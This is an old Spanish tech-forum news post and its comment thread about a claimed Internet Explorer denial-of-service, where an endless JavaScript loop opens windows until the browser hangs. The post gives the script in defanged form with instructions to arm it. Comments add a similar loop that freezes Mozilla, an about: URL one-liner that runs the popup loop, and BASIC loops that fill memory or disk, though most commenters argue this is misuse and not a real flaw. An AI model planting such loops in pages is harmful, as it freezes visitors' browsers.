Banda Ancha EU

Información independiente
sobre fibra, móvil y ADSL

hosting en interdominios

Cerrado

Internet Explorer DoS (window.open)

Ésta mañana SecuriTeam publicaba un nuevo exploit que según parece afecta a todas las versiones de Internet Explorer(no han especificado ninguna), no obstante no he podido verificar que sea en todas las versiones. Se trata de una modificación sobre un JavaScript, de los más utilizados, el 'window.open();'.

La Síntaxis del Exploit es la siguiente:

<scr!pt>
var i;
i=0;
for(;;) {
i++;
window.open('http://www.bandaancha.st','Ventanita'+i,null);
}
</script>

Básicamente solo consiste en cambiar la !(<scr!pt>) por i(<script>).
Por el momento, nadie microsoft no ha anunciado nada al respecto.

PD: He modificado la sintaxis, por equivocación lo habia escrito al revés. ;)

Los comentarios más recientes se muestran primero. Haz click sobre un comentario para desplegar/plegar.
  • Cerrado

    eso es un exploit?

    A ver... ah! vale, por ejemplo se me ocurre un exploit universal mucho más maligno válido para todas las máquinas habidas desde que yo recuerde, desde los 8 bits(msx, commodore, expectrum...) que adaptando un poco funciona en los equipos actuales:

    10 POKE INT(RND*255) , INT(RND*65535) : GOTO 10

    (Escribe datos aleatorios en direcciones aleatorias de memoria, sólo en los primeros 64kb para que funciones en ordenadores viejos)

    O este tb sería muy majo:

    10 OPEN "X.XXX" FOR OUTPUT AS #1 : PRINT #1,"JUASJUAS!" : GOTO 10

    (abre un archivo y lo va llenando de "JUASJUAS!" hasta que se acabe el espacio del disco duro)

    Estos malos usos (como bien han llamado antes) de la programación han existido y existiran siempre, si esto fuera una vulnerabilidad o un exploit estaríamos listos, vaya pedazo de lista habría.

    P.D. Que tiempos aquellos... XD

    • Cerrado

      BocaDePez BocaDePez
      0

      Pues realmente eso puede llegar a ser un exploit. Hacer un…

      Pues realmente eso puede llegar a ser un exploit. Hacer un segment fault en un programa setuid...etc. Vamos q me refiero a que el 90% de los exploits se basan en algun tipo overflow. Ya sea de buffer,disco,etc..

      Por cierto, tu "exploit" no haría nada en un sistema moderno, para eso existe la proteción de memoria

    • Cerrado

      BocaDePez BocaDePez
      0

      xD esto ni es exploit ni es nah fallos de estos siempre han…

      xD

      esto ni es exploit ni es nah fallos de estos siempre han estado presentes y estaran :D desde k se kreo la programacion

  • Cerrado

    6

    Temas poco interesantes....

    Sisi...últimamente se está haciendo muy jaker el *dj con temas en portada tan "interesantes" como este...Algún día nos contara como programar el exploit para petar cds.

    (Para el que no sepa como es: Consiste en rallarlos)

  • Cerrado

    Los reyes magos no existen...

    Wow, pedazo de vulnerabilidad, que raro que un megajeiker como tu nunca se haya preguntado porque se habren tantos popups en la paginas xxx.

    Si se convierte en un problema para ti solo tienes que utilizar un programa como "Popup killer", "proxomitron" o desactivar el javascript en el navegador.

    PS: Si!! un bocadepez registrado jurjur!!

    • Cerrado

      Ya esta bien de tanto criticar, y haber si aportamos entre…

      Ya esta bien de tanto criticar, y haber si aportamos entre todo algo mas que criticas inutiles. Que sean criticas interesantes, no como el skyp0e7 que veo que se revana los sesos para dejar claro que no le gusta esta noticia.

      Un saludo

      • Cerrado

        ... yo trato de hacer mis aportaciones enviando artículos…

        ... yo trato de hacer mis aportaciones enviando artículos siempre que puedo, si no los publican ya no es cosa mía.

        Y creo que no soy el único al que no le gusta la "noticia". Es absurdo poner en portada ésto como si fuera la novedad del siglo XXI cuando los bucles infinitos existen desde siempre y más de una vez y de dos se pueden encontrar puteando cuando navegas por la WWW

        En fin, cada uno es libre de opinar, pero las cosas no siempre se están haciendo bien por aquí...

  • Cerrado

    Como calar mozilla en 1 segundo...

    Dedicado a los que dicen que mozilla/netscape es "cool" y iexplorer una kk.

    Poned este codigo en un .html y abridlo con el mozilla:

    <script languaje=javascript>
    function pozi() {
    var i;
    i=0;
    for(;;){
    i++;
    document.write("Me creo juanker y no llego ni a zerocool");
    }
    }
    </script>
    <body onload="pozi();"
    </body>

    Ahora abridlo con iexplorer y me contais listillos...Y a ver si aprendemos a diferenciar entre vulnerabilidad y un mal uso.

    • Cerrado

      Tanto una mala programación como un mal uso lleva a la…

      Tanto una mala programación como un mal uso lleva a la vulnerabilidad.
      Si por medio de un mal uso se llega a algún error, entonces es vulnerable por ese lado. Esto no es un error de programación, tampoco una explotación; sino q es un abuso. Y no por ser víctima de un abuso deja de ser vulnerable.
      Pienso q sigue siendo válida la expresión de vulnerabilidad y q su relación sigue siendo muy estrecha.

      .::hypnosys::.

    • Cerrado

      Ahora que lo veo con detenimiento, el codigo este sobra: var…

      Ahora que lo veo con detenimiento, el codigo este sobra:

      var i;
      i=0;
      i++;

      Quedaria tal que:

      function pozi() {
      for(;;){
      document.write("Me creo juanker y no llego ni a zerocool");
      }
      }

    • Cerrado

      BocaDePez BocaDePez
      0

      Cual es la diferencia exacta??? A mi se me cuelgan los dos…

      Cual es la diferencia exacta???

      A mi se me cuelgan los dos que da gusto.

      La diferencia, es que en IE salen lo de que "tu" eres un juanker, y en el netscape no.

      Q intentas demostrar?? Q programando mal salen las cosas mal??

  • Cerrado

    B U G ????

    uhm...me lo parece a mi o la gente se ha vuelto loca???

    alguien está diciendo que crear un algoritmo q desemboca en un bucle infinito representa un bug (y no del programa q lo contiene (en este caso el script creado por el usuario))???

    debo entender entonces que un compilador es un programa lleno de 'bugs'??

    ya no me extrañaría ver un post en que se diga que gcc/g++ tienen un bug...sí claro, si me salgo de la casilla de un array me pone "segmentation fault" y mi programa peta....fallo del compilador de C/C++ (pq como soy tan l33t no se me ha ocurrido pensar que lo que falla es mi algoritmo)...

    no confundamos bugs de un programa como puede ser ie con no saber programar, el 'bug' es, en este caso, del script creado, nunca del intérprete/compilador/etc etc etc...

    claro que siempre hay alguno que dice que "lo hago intencionadamente para colgar el ie"...sí, claro, es bastante obvio que si entras en un bucle infinito pase eso, así como cuando haces un bucle tal como este, te saque por pantalla desde 0 a 9998:

    int sale=0,iteracion=0;

    while (!sale){

    printf ("%d\n",iteracion);

    iteracion=iteracion++;

    if(iteracion==9999){

    sale=1;

    }

    }

    ...es que para eso está el lenguaje...o hay que considerarlo como el 'bug' del 9999 de los compiladores de C ???

  • Cerrado

    BocaDePez BocaDePez
    0

    q leen mis ojos !

    creo,bueno creo no, ES simplemente un uso mas de javascript, en un bucle pones muchos window.open y a no ser q tires del taskmanager te abre muchas ventanitas . Pero eso es mas viejo q el mear

    saludooos

    • Cerrado

      pos yo lo he chapao despues de esperar q me abriera unas…

      pos yo lo he chapao despues de esperar q me abriera unas ventanitas con controlaltsupr y se ha cerrado. espero q lo pruebo otra vez...

      otra vez se ha cerrado bien...

      menuda mierda de fallo... q no paren de salirte popups porno es mas molesto q esto...

      tengo: winxp he+ ie6

      saludos

  • Cerrado

    BocaDePez BocaDePez
    0

    Opera

    Pos el Opera tiene una opción, "rechazar ventanas emergentes", algo muy util para impedir que las páginas te abran 100000 ventanas con publicidad, o para que códigos en javascript como este te puedan crear ventanas sin parar.

  • Cerrado

    BocaDePez BocaDePez
    0

    Por favor, quiten la noticia!!!

    Propongo que la noticia se quite de la portada, pq no hace más que bajar el nivel de contenidos de esta web.

    ¿Un exploit? Por favor... Y además se publica el código para que miles de chavalitos les de por joder la marrana.

    • Cerrado

      BocaDePez BocaDePez
      0

      que no hay que utilizar. Creo que con noticias como esta, se…

      que no hay que utilizar.

      Creo que con noticias como esta, se esta demostrando dia a dia que navegador no has de utilizar....

      Y que no me vengan diciendo de que ie no tiene competencia, la tiene y bastante mejor.

      Quiza asi (publicando tal cual el exploit o como quiera llamarse), la gente se lo piense un poco mas antes de utilizar el programa ese.

    • Cerrado

      Realmente el código no es un bug ni exploit... es como si…

      Realmente el código no es un bug ni exploit... es como si haces un programa que reserve mucha memoria, se ponga a escribir en el disco duro información sin parar y similar.

      Creo que otros exploradores tienen la ventaja de limitar el número de ventanas abiertas simultáneamente. En el caso de otros exploradores al cerrar las ventanas no se cuelga linux ni te hace un volcado de pila, ni error de kde ni nada. En windows he probado el opera y no se cuelga windows ni te da pantallazo azul.

      El exploit viene precisamente por eso... no debería haber ningún problema a la hora de cerrar una aplicación (un sistema operativo real separa las aplicaciones de forma que si una cae no afecte al resto del sistema). El problema viene de dos partes... el Internet Explorer que invade el resto del sistema y del propio Windows que se deja invadir. ¿Alguien sigue diciendo que Windows es un sistema operativo? :)

  • Cerrado

    Aclaracion!

    Para que funcione el exploit ay que cambiar la ! de script por una i, lo han puesto asi para que el explorer no ejecute el script, pillais¿, lo que hace esto es que no deja de abrir ventanas una detras de otra, pero basicamente no lo considero un fallo del explorer, mas bien codigo maligno porque lo unico que es, es un bucle infinito que cada vez abre una ventanita, molesto si que es, solo se puede quitar con ctrl-alt+spr, saludos!

    P.D, como pone en securitifocus podeis probar el script simplemente poniendo esto en la barra de direcciones:

    about:<script>var i;i=0;for(;;){i++;window.open('http://www.microsoft.com','Microsoft'+i,null);}</script>

    • Cerrado

      "Básicamente solo consiste en cambiar la i(<script>) por…

      "Básicamente solo consiste en cambiar la i(<script>) por !(<scr!pt>). "

      Como puedes ver, la nota está al revés es normal que la gente se confunda.

1